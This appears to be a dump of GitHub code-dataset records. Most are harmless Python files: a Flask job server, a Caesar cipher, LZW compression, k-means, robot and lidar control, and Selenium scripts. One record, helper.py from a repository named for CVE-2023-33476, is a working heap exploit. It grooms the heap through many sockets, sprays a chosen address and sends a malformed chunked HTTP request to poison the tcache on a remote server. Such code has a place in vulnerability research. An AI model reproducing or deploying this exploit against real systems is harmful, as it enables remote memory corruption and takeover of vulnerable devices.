    {key}: {session[key]}\\n\"\n print(msg)\n SessionData.get().msg = msg\n return redirect(url_for('home'))\n\n@app.route(\"/request\")\n@app.route(\"/\")\ndef req(path):\n sdat = SessionData.get()\n sdat.msg.append(f\"Invalid command: {request.url}\")\n print(f\"req: Ignoring request {request.url}\")\n return redirect(url_for('home'))\n msg = ''\n msg += f\" url: {request.url}

    \"\n msg += f\"root path: {request.root_path}

    \"\n msg += f\" path: {request.path}

    \"\n msg += f\" method: {request.method}

    \"\n msg += f\" endp: {request.endpoint}

    \"\n msg += f\" args: {request.args}

    \"\n msg += f\" form: {request.form}

    \"\n msg += f\" data: {request.data.decode('UTF-8')}

    \"\n msg += f\" json:\"\n if request.is_json:\n msg += f\"{request.get_json()}\"\n msg += f\"

    \"\n msg += f\" get data: {request.get_data().decode('UTF-8')}

    \"\n return msg\n\n@app.route('/favicon.ico')\ndef got_favicon():\n print(f\"got_favicon: Ignoring request {request.url}\")\n return {}\n\n@app.route('/get_job', methods=['POST'])\ndef get_job():\n \"\"\"Handle request to return a job.\"\"\"\n rst = 0\n msg = 'Success.'\n rec = request.json\n missingkeys = []\n for key in ['descname', 'id']:\n if key not in rec: missingkeys += [key]\n if len(missingkeys):\n return {'status':1, 'message':f\"Missing keys in request: {missingkeys}\"}\n jid = int(rec['id'])\n descname = rec['descname']\n job = JobData.get_user_job(descname, jid, usedb=True)\n if job is None:\n return {'status':2, 'message':f\"Job {jid} not found for user {descname}.\"}\n jmap = job.jmap()\n return {'status':0, 'message':'Success', 'job':jmap}\n\n@app.route('/update_job', methods=['POST', 'GET'])\ndef update_job():\n \"\"\"Handle request to update a job.\"\"\"\n if request.method == 'GET':\n return 'Got GET instead of POST!!'\n rec = request.json\n if 'job' not in rec: return {'status':1, 'message':'Request does not include job'}\n jmap = rec['job']\n for nam in ['id', 'descname', 'update_time']:\n if nam not in jmap: return {'status':2, 'message':f\"Request job does not have field {nam}\"}\n if jmap[nam] is None: return {'status':3, 'message':f\"Request job does not have a value for field {nam}\"}\n jid = jmap['id']\n descname = jmap['descname']\n job = JobData.get_user_job(descname, jid, usedb=True)\n if job is None:\n otim = 0\n else:\n otim = job.update_time()\n if otim is None:\n otim = 0\n print(f\"update_job: WARNING: Handling job {descname}/{jid} with missing update time.\")\n utim = jmap['update_time']\n try:\n dtim = utim - otim\n except:\n return {'status':4, 'message':f\"Invalid time interval: {utim} - {otim}\"}\n if job is None: return {'status':5, 'message':f\"Job {jid} not found for user {descname}\"}\n if dtim <= 0: return {'status':6, 'message':f\"Job {descname}/{jid}: Update is {-dtim} seconds behind current job.\"}\n errmsg = job.jmap_update(jmap)\n if len(errmsg): return {'status':5, 'message':f\"Job {descname}/{jid}: {errmsg}\"}\n return {'status':0}\n\n@app.route('/add_child_job', methods=['POST', 'GET'])\ndef add_child_job():\n \"\"\"Handle request to add a job.\"\"\"\n if request.method == 'GET':\n return 'Got GET instead of POST!!'\n jmap = request.json\n for nam in ['jobtype', 'config', 'parent', 'descname']:\n if nam not in jmap: return {'status':1, 'message':f\"Request to add child job does not have field {nam}\"}\n if jmap[nam] is None: return {'status':2, 'message':f\"Request to add child job does not have a value for field {nam}\"}\n jobtype = jmap['jobtype']\n cfg = jmap['config']\n hfg = jmap['howfig']\n parent = int(jmap['parent'])\n descname = jmap['descname']\n # Require parent has the same username.\n pjob = JobData.get_user_job(descname, parent, usedb=True)\n if pjob is None:\n return {'status':3, 'message':f\"Parent job {descname}/{parent} was not found\"}\n sid = pjob.session()\n jid = get_jobid()\n jdat = JobData(jid, descname)\n if jdat.configure(jobtype, cfg, hfg, sid, parent):\n return {'status':4, 'message':jdat.errmsgs[-1]}\n print(f\"add_child_job: Added and configured child job {descname}/{jid}: {jobtype} {cfg}\")\n return {'status':0, 'job':jdat.jmap()}\n","repo_name":"LSSTDESC/desc-prod","sub_path":"server/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":29974,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12314401340","text":"#!/usr/bin/env python3\nimport pwn\nimport os\nimport sys\nimport socket\nimport time\n\nTIME = 0.2\nALLOC_SIZE = 0x60-8\n\nasciitxt = \"\"\"\n ___ ___ ___ ___ ___ \n / /\\ /__/\\ / /\\ /__/\\ /__/| ___ \n / /:/ \\ \\:\\ / /::\\ \\ \\:\\ | |:| /__/| \n / /:/ \\__\\:\\ / /:/\\:\\ \\ \\:\\ | |:| | |:| \n / /:/ ___ ___ / /::\\ / /:/ \\:\\ _____\\__\\:\\ __| |:| | |:| \n /__/:/ / /\\ /__/\\ /:/\\:\\ /__/:/ \\__\\:\\ /__/::::::::\\ /__/\\_|:|____ __|__|:| \n \\ \\:\\ / /:/ \\ \\:\\/:/__\\/ \\ \\:\\ / /:/ \\ \\:\\~~\\~~\\/ \\ \\:\\/:::::/ /__/::::\\ \n \\ \\:\\ /:/ \\ \\::/ \\ \\:\\ /:/ \\ \\:\\ ~~~ \\ \\::/~~~~ ~\\~~\\:\\ \n \\ \\:\\/:/ \\ \\:\\ \\ \\:\\/:/ \\ \\:\\ \\ \\:\\ \\ \\:\\ \n \\ \\::/ \\ \\:\\ \\ \\::/ \\ \\:\\ \\ \\:\\ \\__\\/\n \\__\\/ \\__\\/ \\__\\/ \\__\\/ \\__\\/ \n\"\"\"\n\n# printer for hex values in argparse output\ndef hexarg(x):\n return int(x, 16)\n\n\n# obligatory exploit printers\ndef xpr(msg):\n print(f\"[+]: {msg}\")\n\ndef debb(msg):\n print(f\"[-] {msg}\")\n\ndef xerr(msg):\n print(f\"[!] ERROR: {msg}\")\n\n# padding helper\ndef pad(size, data):\n pad_byte = b\"\\x99\"\n if len(data) > size:\n return data\n pad_size = size - len(data)\n new_data = data + (pad_byte * pad_size)\n if len(new_data) != size:\n raise Exception\n return new_data\n\n# create a single socket with keepalive \ndef singlesock(keepalive=True):\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n if keepalive:\n sock.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)\n return sock\n\n# create `count` sockets and return them in a list\ndef create_sockets(count):\n socks = []\n for i in range(0, count):\n socks.append(singlesock())\n return socks\n\n# connect the sockets in the given list of sockets `sock_list`\ndef connect_sockets(sock_list, target_ip, port, timeout=None):\n for sock in sock_list:\n sock.settimeout(timeout)\n sock.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)\n try:\n sock.connect((target_ip, int(port)))\n except ConnectionRefusedError:\n xerr(\"connection refused, check arguments or ensure server is up\")\n sys.exit(1)\n\n# disconnect a list of sockets\ndef disconnect_all(sock_list, reverse=False):\n if reverse:\n sock_list.reverse()\n for sock in sock_list:\n sock.close()\n\n# send data on a list of open sockets\ndef sendsocks(socks_list, payload):\n for sock in socks_list:\n sock.send(payload, 2)\n time.sleep(TIME)\n\n# Class representing a payload object to trigger the bug\nclass Payload(object):\n HTTP_HEADER_PADDING_BYTE = \"K\"\n def __init__(self,\n chunk_size:int,\n whitespace_size:int,\n prepad_len:int=0,\n http_header_pad:int=0,\n inner_pad:int=0,\n total_req_size:int=0,\n ) -> None:\n self.http_chunk_size = chunk_size\n self.whitespace_pad_len = whitespace_size\n self.http_header_pad_len = http_header_pad\n self.post_chunk_pad_len = inner_pad\n\n self.prepad_len = prepad_len\n self.whitespace_buf = b\"\"\n self.prepad_buf = b\"\"\n self.http_headers = b\"\"\n self.http_body = b\"\"\n self.zero_chunk = self.make_chunk(0, 0)\n self.request_target_size = total_req_size\n self.complete = None\n\n if total_req_size > 0:\n self.compose_sized(self.whitespace_pad_len, self.request_target_size)\n\n @property\n def total_size(self):\n \"\"\"\n to be called after one of the compose functions, which will fill in the buffers\n the zero chunk isn't put here explicity but is expected to have been combined with the\n http_body\n \"\"\"\n return len(self.complete)\n\n def make_prepad(self, length:int, marker_char=\"\"):\n \"\"\"Create padding buf to prepend before HTTP request\"\"\"\n return b\"A\"*length\n\n def make_headers(self, padding: int):\n \"\"\"Construct the HTTP headers for the request\"\"\"\n abuf = self.HTTP_HEADER_PADDING_BYTE * padding\n payload = \"L AAAA\\r\\n\"\n payload += \"Transfer-Encoding:chunked\\r\\r\"\n payload += f\"{abuf}\\r\\n\\r\\n\"\n return payload.encode()\n\n def make_chunk(self, chunk_size:int, inner_pad:int):\n \"\"\"Construct an HTTP chunk for the request\"\"\"\n # return make_http_chunk(chunk_size, inner_pad, term=False)\n buf = \"0\" * inner_pad\n\n # convert the value from user to hex since this is how it will b interpreted by the application.\n target_chunk_hex = hex(chunk_size)[2:]\n payload = \"\"\n payload += f\"{target_chunk_hex}\\r\\n\"\n payload += f\"{buf}\\r\\n\"\n\n return payload.encode()\n\n def calculate_oob_read_size(self):\n \"\"\"calculate how far OOB from the current req buf the given CHUNK_SIZE will allow us to read\"\"\"\n NL_LEN = 2\n body_len = len(self.http_body)\n chunk_size_hex_len = len(hex(self.http_chunk_size)) - len(\"0x\")\n size_and_nl = chunk_size_hex_len + NL_LEN\n term_len = len(self.zero_chunk)\n return self.http_chunk_size - (body_len - size_and_nl) - term_len\n\n def compose_sized(self, whitespace_len, size, with_zero_chunk=True):\n \"\"\"compose a full payload while maintaining a constant request size\"\"\"\n whitespace_buf = b\"\\x20\" * whitespace_len\n http_headers = self.make_headers(self.http_header_pad_len)\n http_chunk = self.make_chunk(self.http_chunk_size, self.post_chunk_pad_len)\n min_len = len(http_headers) + whitespace_len + len(http_chunk) + len(self.zero_chunk)\n\n if min_len > size:\n xpr(f\"WARNING: minimum length required for request based on parameters exceeds defined target length of {size}\")\n bytes_left = size - min_len\n pre_padding = self.make_prepad(bytes_left)\n\n self.whitespace_pad_len = whitespace_len\n self.whitespace_buf = whitespace_buf\n self.prepad_len = bytes_left\n self.prepad_buf = pre_padding\n self.http_headers = http_headers\n self.http_body = http_chunk\n if with_zero_chunk:\n self.http_body += self.zero_chunk\n self.complete = self.prepad_buf + self.http_headers + self.whitespace_buf + self.http_body\n return self.complete\n\n def compose(self, whitespace_len, pre_pad=0, with_zero_chunk=True):\n \"\"\"compose a full payload without regard for final request size\"\"\"\n self.prepad_len = pre_pad\n self.prepad_buf = self.make_prepad(pre_pad)\n self.whitespace_buf = b\"\\x20\" * whitespace_len\n self.http_headers = self.make_headers(self.http_header_pad_len)\n self.http_body = self.make_chunk(self.http_chunk_size, self.post_chunk_pad_len)\n if with_zero_chunk:\n self.http_body += self.zero_chunk\n self.complete = self.prepad_buf + self.http_headers + self.whitespace_buf + self.http_body\n\n def dump(self):\n print(self.complete)\n\n\ndef fengshui(target_addr:int, server_ip:str, server_port:int):\n \"\"\"\n this function is used to set the heap up in a favorable manner for the exploit.\n important points to know:\n * connecting a socket creates a upnphttp struct of 0x100 size\n * sending data on a socket will allocate that many bytes, up to 2048 at time;\n * the allocation that occurs on sending data use realloc()\n\n purpose:\n * clears the tcache bin for the given size and sprays the allocations\n with payloads containing the target address we want inserted into the bin.\n * forces allocs to start happening from the top chunk, so the allocations\n become sequential in memory.\n * sequential allocs happen around the 6-7 sprays in;\n * the socks at the end of this list are from the start of massaged region\n * free these LIFO from the tail to ensure our next allocs for the\n corruption will come from that region\n \"\"\"\n\n # create and connect needed sockets before sending any data on any of them.\n # This should keep the allocations for the upnphttp structs separate from\n # the request buffer allocations\n GROOMING_ALLOCS = 10\n xpr(f\"starting heap grooming round, using {GROOMING_ALLOCS} allocs...\")\n dummies = create_sockets(GROOMING_ALLOCS)\n connect_sockets(dummies, server_ip, server_port)\n\n # This is the target address we want malloc to return after the chunk has\n # been corrupted\n where = pwn.pack(target_addr, 64)\n\n # create the fake chunk described above. pad with 16 bytes to skip the first\n # 2 8-byte fields which are `bk` and `fd`\n pre_pad = b\"\\x11\" * 16 # \\x11 is arbitrary\n core = pre_pad + where\n\n # pad the end of the payload with enough bytes to meet the size needed for\n # the target tcache bin allocations need to be kept the same size because\n # tcache bins must match exact sizes\n payload = pad(ALLOC_SIZE, core)\n\n # send the payload on all of the sockets we opened; this should result in 10\n # request buffer allocations; the last 3-4 will be allocated sequentially.\n sendsocks(dummies, payload)\n\n # free the last 4 allocs we made in reverse order to add those chunks to the\n # tcache bin for the matching size so they're returned to us on the next\n # allocations we make of the same size. by closing the sockets, we free\n # both the upnphttp structs and the request buffers they contain.\n dummies.pop().close()\n dummies.pop().close()\n dummies.pop().close()\n dummies.pop().close()\n\n # these need to be returned here to ensure they stay open for the remainder\n # of the exploit\n xpr(f\"heap grooming complete\")\n return dummies\n\ndef heap_corruption(malloc_return_target, target_ip, target_port):\n # a bit of setup and heap massaging to get things a bit more reliable\n dummies = fengshui(malloc_return_target, target_ip, target_port)\n\n # at this point we should have a heap layout that looks something like this\n # - { dummy upnphttp }\n # - { dummy upnphttp }\n # - { dummy upnphttp }\n # - { dummy upnphttp }\n # - { free'd upnphttp }\n # - { free'd upnphttp }\n # - { free'd upnphttp }\n # - { free'd upnphttp }\n # - { alloc'd payload spray }\n # - { alloc'd payload spray }\n # - { alloc'd payload spray } <-- sequential alloc's should start around here\n # - { alloc'd payload spray }\n # - { free'd payload spray } <-- these are free'd in reverse order so the\n # - { free'd payload spray } next alloc's we make will come from the\n # - { free'd payload spray } here\n # - { free'd payload spray }\n\n # send the request to cause the corruption and kick off the exploit\n # we use 12 bytes of whitespace padding before the chunk size value because:\n # - 8 bytes for `fd`\n # - 8 bytes for `bk` (the -4 bytes to get to 16 are accounted for\n # by the 4 bytes of the chunk size string '40\\r\\n' (0x40 = 64 chunk size)\n # chunk size of 64 since\n # - the read will start ~8 bytes from the end of the req,\n # - 16 bytes for size and prev_size chunk fields\n # - 16 bytes for `fd` and `bk`\n # - 8 bytes of payload data (the target addr)\n # - total: ~48 bytes, go a bit higher for a safety margin just in case\n xpr(f\"sending request to trigger the bug and corrupt the free'd chunks...\")\n payload = Payload(chunk_size=64, whitespace_size=12, total_req_size=ALLOC_SIZE)\n corrupt_sock = singlesock()\n connect_sockets([corrupt_sock], target_ip, target_port)\n corrupt_sock.send(payload.complete, 2)\n time.sleep(TIME)\n corrupt_sock.close()\n xpr(f\"tcache poison complete, the bad chunk should be ready for allocation\")\n return dummies\n\n","repo_name":"mellow-hype/cve-2023-33476","sub_path":"exploits/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":11959,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"37"} +{"seq_id":"30298727204","text":"from Convergence import Convergence\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\ndef single_run(cbf_para, CBF, fig_num):\r\n d_range = 2 * 10\r\n u_range = 2 * 15\r\n\r\n\r\n plt.figure(fig_num)\r\n convergence = Convergence()\r\n stop1 = 0\r\n history = []\r\n for i in range(d_range):\r\n for j in range(u_range):\r\n d = 0.5 * i\r\n u = 0.5 * j\r\n crash = convergence.examine([d, u], CBF, cbf_para)\r\n if crash == 0:\r\n plt.scatter(d,u,marker='s',color='limegreen')\r\n stop1 += 1\r\n else:\r\n plt.scatter(d,u,marker='x',color='gold')\r\n history.append([d,u,crash])\r\n plt.xlabel('d (m)')\r\n plt.ylabel('u (m/s)')\r\n plt.title(\"Barrier constraints, Np=6, $\\lambda=$\"+str(cbf_para))\r\n plt.show()\r\n\r\n print(cbf_para, stop1)\r\n name = 'history' + str(cbf_para) + '.txt'\r\n np.savetxt(name, np.array(history))\r\n\r\nif __name__ == '__main__':\r\n CBF = 0\r\n cbf_para = 1\r\n i = 0\r\n single_run(cbf_para, CBF, i)\r\n cbf_para = 0.7\r\n i += 1\r\n single_run(cbf_para, CBF, i)\r\n cbf_para = 0.4\r\n i += 1\r\n single_run(cbf_para, CBF, i)\r\n cbf_para = 0.1\r\n i += 1\r\n single_run(cbf_para, CBF, i)\r\n cbf_para = 0.01\r\n i += 1\r\n single_run(cbf_para, CBF, i)","repo_name":"ShallowDream0745/CarFollow","sub_path":"cbf_backup/cbf.py","file_name":"cbf.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"12877808293","text":"\n\ndef alphabet_position(letter):\n lower_letter = letter.lower()\n alphabet = [\"a\", \"b\", \"c\", \"d\", \"e\", \"f\", \"g\", 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z']\n return alphabet.index(lower_letter)\n\ndef rotate_character(char, rot):\n\n alphabet = [\"a\", \"b\", \"c\", \"d\", \"e\", \"f\", \"g\", 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z']\n\n if str(char).isalpha():\n char_index = alphabet_position(char)\n if char.isupper():\n return alphabet[(char_index+rot)%26].upper()\n else:\n return alphabet[(char_index+rot)%26].lower()\n else:\n return char\n\n\ndef encrypt(text,rot):\n s = ''\n newText = []\n for i in range(len(text)):\n newText.append(rotate_character(text[i],int(rot)))\n return s.join(newText)\n","repo_name":"militoj/web-caesar","sub_path":"caesar.py","file_name":"caesar.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21780847491","text":"from operator import index, indexOf\n\n\nA = [[1, 2, 3, 4], [5, 6, 7, 8], [2, 3, 9, 3]]\n\nfor i in range(len(A)):\n for j in range(len(A[i])):\n if (i!=0 and i != len(A) - 1 ) and (j!=0 and j != len(A[i]) - 1):\n print(\" \", end='\\t')\n else:\n print(A[i][j], end='\\t')\n print('')\n\n\n# i is not 0 and i is not 2\n# j is not 0 and j is not 3\n\n# x = [1,2,3,4]\n# y = x.copy()\n\n# print(x is y)","repo_name":"abaddontsoi/2239","sub_path":"tutor/tutor1/tutor1_4.py","file_name":"tutor1_4.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40036876752","text":"#!/usr/bin/env python\n# abstract the input.\nimport ecto\nfrom ecto_opencv import highgui, calib, imgproc, cv_bp as cv\nfrom object_recognition.observations import *\nimport ecto_ros, ecto_sensor_msgs\nfrom ecto_object_recognition import capture\n\nImageSub = ecto_sensor_msgs.Subscriber_Image\nCameraInfoSub = ecto_sensor_msgs.Subscriber_CameraInfo\nImageBagger = ecto_sensor_msgs.Bagger_Image\nCameraInfoBagger = ecto_sensor_msgs.Bagger_CameraInfo\n\nplasm = ecto.Plasm()\n\nsubs = dict(image=ImageSub(topic_name='/camera/rgb/image_color', queue_size=0),\n depth=ImageSub(topic_name='/camera/depth_registered/image', queue_size=0),\n image_ci=CameraInfoSub(topic_name='/camera/rgb/camera_info', queue_size=0),\n depth_ci=CameraInfoSub(topic_name='/camera/depth_registered/camera_info', queue_size=0),\n )\n\nsync = ecto_ros.Synchronizer('Synchronizator', subs=subs\n )\n\nim2mat_rgb = ecto_ros.Image2Mat('rgb -> cv::Mat')\ncamera_info = ecto_ros.CameraInfo2Cv('camera_info -> cv::Mat')\nposer = OpposingDotPoseEstimator(plasm,\n rows=5, cols=3,\n pattern_type=calib.ASYMMETRIC_CIRCLES_GRID,\n square_size=0.04, debug=True)\n\nbgr2rgb = imgproc.cvtColor('rgb -> bgr', flag=imgproc.Conversion.RGB2BGR)\nrgb2gray = imgproc.cvtColor('rgb -> gray', flag=imgproc.Conversion.RGB2GRAY)\ndisplay = highgui.imshow('Poses', name='Poses', waitKey=5, autoSize=True)\n\ngraph = [sync['image'] >> im2mat_rgb[:],\n im2mat_rgb[:] >> (rgb2gray[:], bgr2rgb[:]),\n bgr2rgb[:] >> poser['color_image'],\n rgb2gray[:] >> poser['image'],\n poser['debug_image'] >> display['input'],\n sync['image_ci'] >> camera_info['camera_info'],\n camera_info['K'] >> poser['K'],\n ]\nplasm.connect(graph)\n\nif __name__ == '__main__':\n import sys\n ecto_ros.init(sys.argv, \"opposing_dots_pose\", False)\n from ecto.opts import doit\n doit(plasm, description='Estimate the pose of an opposing dot fiducial.')\n\n","repo_name":"eitanme/object_recognition","sub_path":"test/openni_opposing_dots.py","file_name":"openni_opposing_dots.py","file_ext":"py","file_size_in_byte":2069,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"17187952252","text":"import numpy as np\nimport scipy.spatial as sp\nfrom scipy.io import arff\nfrom sklearn.metrics import confusion_matrix\n\n#-------------------------------------------------------------------------------------------------------------------------------------\nclass kmeans(object):\n\t\"\"\" This class defines the K-Means algorithm. \"\"\"\n\n\t# @brief: \n\t#\t\t Constructor method that receives the K parameter of the k means and the distance method to be used to compute\n\t#\t\t the distance between the samples/points. If the distance_metric arguments is ignored the algorithm will use an\n\t#\t\t euclidean distance.\n\tdef __init__(self, k, distance_metric = sp.distance.euclidean):\n\t\tself.k = k\n\t\tself.distance_metric = distance_metric\n\t\tself.centroids = None\n\n\t# @brief: \n\t#\t\t This is a private function that receives data points and returns a list where each entry i is the list of points\n\t#\t assigned to centroid i.\n\t# NOTE:\t This funtion will be usefull for the training and prediction methods.\n\tdef __centroid_assignment(self, data):\n\t\tassignment = []\n\t\tfor i in range(0, self.k):\n\t\t\tassignment.append([])\n\t\t\t\n\t\t# this list will store the samples assigned to each centroid k\n\t\tfor i in range(0, len(data)):\n\t\t\tclosest_centroid = None\n\t\t\tdistance = float('inf') # initialize the distance to an infinite number\n\n\t\t\tfor j in range(0, self.k):\n\t\t\t\tif distance > self.distance_metric(data[i], self.centroids[j]):\n\t\t\t\t\tclosest_centroid = j\n\t\t\t\t\tdistance = self.distance_metric(data[i], self.centroids[j])\n\n\t\t\tassignment[closest_centroid].insert(0, data[i])\n\n\t\treturn assignment\n\n\t# @brief: \n\t#\t\t This function computes the k centroids given a dataset.\n\t#\t\t The maxit argument specifies the maximum number of iterations the algorithm will perform. Note that the algorithm can \n\t#\t\t stop before the maximum number of iteration if it converges.\n\tdef train(self, data, maxit = 200, seed = None):\n\t\t#---------------------------------------------------------------------------------\n\t\t# @brief: \n\t\t#\t\t Auxiliar local function that computes the mean point over a set of points.\n\t\t# NOTE: This function is an alternative to np.mean functions that gives NaN. \n\t\tdef update_centroid(samples, centroid):\n\t\t\tupdated_centroid = np.zeros(len(samples[0]))\n\t\t\t# no update case\n\t\t\tif len(samples) == 0:\n\t\t\t\treturn centroid\n\n\t\t\t# update case\n\t\t\tfor i in range(0, len(samples[0])):\n\t\t\t\tfor sample in samples:\n\t\t\t\t\tupdated_centroid[i] += sample[i]\n\t\t\t\tupdated_centroid[i] = updated_centroid[i]/len(samples)\n\t\t\treturn np.array(updated_centroid)\n\t\t#---------------------------------------------------------------------------------\n\t\trows = len(data)\n\n\t\t# random initialization of the centroids\n\t\tif seed:\n\t\t\tnp.random.seed(seed)\n\t\tself.centroids = [np.array(data[np.random.randint(0, rows)]) for _ in range(0, self.k)]\n\n\t\tupdate = True # variable to check if the algorithm has converged.\n\t\tcount = 0 # count the number of iterations\n\t\twhile (count < maxit and update):\n\n\t\t\tassignment = self.__centroid_assignment(data)\n\t\t\tupdate = False # lets assume that we have converged. if in the next cycle the value changes to True, this assumption was wrong.\n\t\t\tfor k in range(0, self.k):\n\t\t\t\tupdated_centroid = update_centroid(assignment[k], self.centroids[k])\n\t\t\t\tif not np.array_equal(updated_centroid, self.centroids[k]):\n\t\t\t\t\tupdate = True\n\t\t\t\t\tself.centroids[k] = updated_centroid\n\t\t\tcount += 1\n\n\t\treturn self.centroids\n\n\t# @brief: \n\t#\t\t This algorithm receives a set of points and returns a list where each entry i has the value of the cluster \n\t#\t\t assigned to the ith sample in the data.\n\tdef predict(self, data):\n\t\tassignment = self.__centroid_assignment(data)\n\t\t# convert assignments to list in order to use the operation \"in\"\n\t\tfor i in range(0, self.k):\n\t\t\tfor j in range(0, len(assignment[i])):\n\t\t\t\tassignment[i][j] = assignment[i][j].tolist()\n\n\t\t# convert data to list to\n\t\tdata = data.tolist()\n\t\tlabels = [None]*len(data)\n\t\tfor i in range(0, len(data)):\n\t\t\tfor k in range(0, self.k):\n\t\t\t\tif data[i] in assignment[k]:\n\t\t\t\t\tlabels[i] = k\n\t\t\t\t\tbreak\n\t\treturn labels\n#-------------------------------------------------------------------------------------------------------------------------------------\n","repo_name":"ricardorei/Bioinformatics","sub_path":"lab5/kmeans.py","file_name":"kmeans.py","file_ext":"py","file_size_in_byte":4176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11173583097","text":"import cv2\r\nimport numpy as np\r\nimport serial\r\nimport middle\r\nimport camera\r\nfrom time import sleep\r\nfrom imgpreprocess import *\r\nfrom birdeye import *\r\nfrom utility import *\r\nfrom rplidar import RPLidar\r\nfrom stopping import *\r\nimport time\r\nimport os\r\nfrom math import floor\r\n\r\n# from yolov5.models.common import DetectMultiBackend\r\n# from yolov5.utils.general import non_max_suppression\r\n\r\n# detect_net = DetectMultiBackend(weights=\"./yolo_best_0205_openvino_model\")\r\n# labels_to_names = {0 : \"Crosswalk\", 1 : \"Green\", 2 : \"Red\", 3 : \"Car\"}\r\nport = 'COM7'\r\nPORT_NAME = 'COM20'\r\nlidar = RPLidar(PORT_NAME, timeout=3)\r\nbaudrate = 9600\r\nser = serial.Serial(port, baudrate, )\r\n\r\nif ser.is_open:\r\n ser.close()\r\n\r\nser.open()\r\nwidth = 640\r\nheight = 480\r\nslope_list = np.empty(1)\r\nstage = 0\r\ncapture = camera.CameraModule(width=640, height=480)\r\ncapture.open_cam(0)\r\nwhile True:\r\n try:\r\n if (stage == 0):\r\n start_time = time.time()\r\n end_time = start_time + 2\r\n while time.time() < end_time:\r\n message = 'a' + str(0) + 's' + str(75)\r\n ser.write(message.encode())\r\n time.sleep(0.025)\r\n stage = 1\r\n if (stage == 1):\r\n for scan in lidar.iter_scans():\r\n for (_, angle, distance) in scan:\r\n if (floor(angle) == 90 or floor(angle) == 91 or floor(angle) == 89):\r\n print(floor(angle), distance)\r\n if (500 str:\n return f'temp_word={self._temp_word} index_list={self.index_list}'\n\n def append_char(self, char):\n '''\n 추가하는 문자(char) 와 객체에 보관중인 temp_word 를 합쳐서 사전에 있는지 확인\n 사전에 있으면 temp_word 에 char 를 합체\n 사전에 없으면 temp_word 의 인덱스를 구하고 temp_word 를 비워고 char 를 temp_word 에 대입\n '''\n if self._temp_word+char in self._word_dict :\n self._temp_word += char\n else :\n self.append(self._temp_word+char)\n self.index_list.append(self._word_dict.get(self._temp_word))\n self._temp_word = char\n\n def flush(self):\n '''\n 미처리한 temp_word 의 인덱스를 구한다.\n '''\n self.index_list.append(self._word_dict.get(self._temp_word))\n self._temp_word = ''\n\n def append(self, word): # 사전에 단어를 등록한다.\n self.last_value += 1\n self._word_dict[word] = self.last_value\n\ndef solution(msg):\n answer = []\n word_dict = WordDict()\n for c in msg :\n word_dict.append_char(c)\n # print(f'{c} after append : {word_dict}')\n word_dict.flush()\n # print(f'after flush : {word_dict}')\n answer = word_dict.index_list\n return answer\n\nprint(solution('KAKAO'))\nprint(solution('TOBEORNOTTOBEORTOBEORNOT'))\nprint(solution('ABABABABABABABAB'))\nprint(solution('A'))\n","repo_name":"csw180/coding_py","sub_path":"pg17684.py","file_name":"pg17684.py","file_ext":"py","file_size_in_byte":1827,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39563385800","text":"# Python Class Decorator\n\nclass MyDecorator(object):\n def __init__(self, func):\n self._func = func\n \n def __call__(self, name):\n print('Some decoration code before method')\n result = self._func(name)\n print('Some decoration code after method')\n return 'Decorated result: {}'.format(result)\n\ndef my_method(name):\n result = 'My name is {}'.format(name)\n print(result)\n return result\n \n@MyDecorator\ndef my_method_decorated(name):\n result = 'My name is {}'.format(name)\n print(result)\n return result\n \n\nif __name__ == '__main__':\n # Equivalent ways to represent class decorator\n \n # Call method my_method decorated with decorator class MyDecorator \n # without using sintatical sugar @MyDecorator\n print((MyDecorator(my_method))('Peter'))\n \n # Call method my_method_decorated decorated with MyDecorator\n # with useing sintatical sugar @MyDecorator\n print(my_method_decorated('Peter'))\n\n\n\n","repo_name":"hooppler/PythonTipsAndTricks","sub_path":"decorators/class_decorator.py","file_name":"class_decorator.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"25431077894","text":"from selenium import webdriver\n\nbrowser=webdriver.Chrome(\"C:\\Program Files\\PythonWorkspace\\chromedriver.exe\")\n#(\"실행파일 위치\") 같은 폴더면 안넣어도 됨\nbrowser.get(\"https://naver.com\")\nelem = browser.find_element_by_class_name(\"link_login\")\nelem.click() # elem 변수를 클릭\nbrowser.refresh() # 새로고침\nbrowser.back() # 뒤로가기 \nelem = browser.find_element_by_id(\"query\") # 검색어창\nfrom selenium.webdriver.common.keys import Keys # 키보드 사용\nelem.send_keys(\"나도코딩\")\nelem.send_keys(Keys.ENTER) #엔터키로 검색\n# elem = browser.find_element_by_tag_name(\"a\") # a로 시작하는 엘리먼트 객체 가져오기\nelem = browser.find_elements_by_tag_name(\"a\") # a로 시작하는 엘리먼트 객체 모두 가져오기\nfor e in elem:\n e.get_attribute(\"href\") \n # element가 가진 attribute 값을 가져옴 beautiful soup4와 다름\n continue\n\n# 다음 검색\nbrowser.get(\"https://daum.net\")\nelem = browser.find_element_by_name(\"q\")\nelem.send_keys(\"나도코딩\")\nelem.send_keys(Keys.ENTER)\nbrowser.back()\nelem = browser.find_element_by_name(\"q\") # 페이지 전환이 되었기 때문에 다시 element 세팅\nelem.send_keys(\"나도코딩\")\nelem = 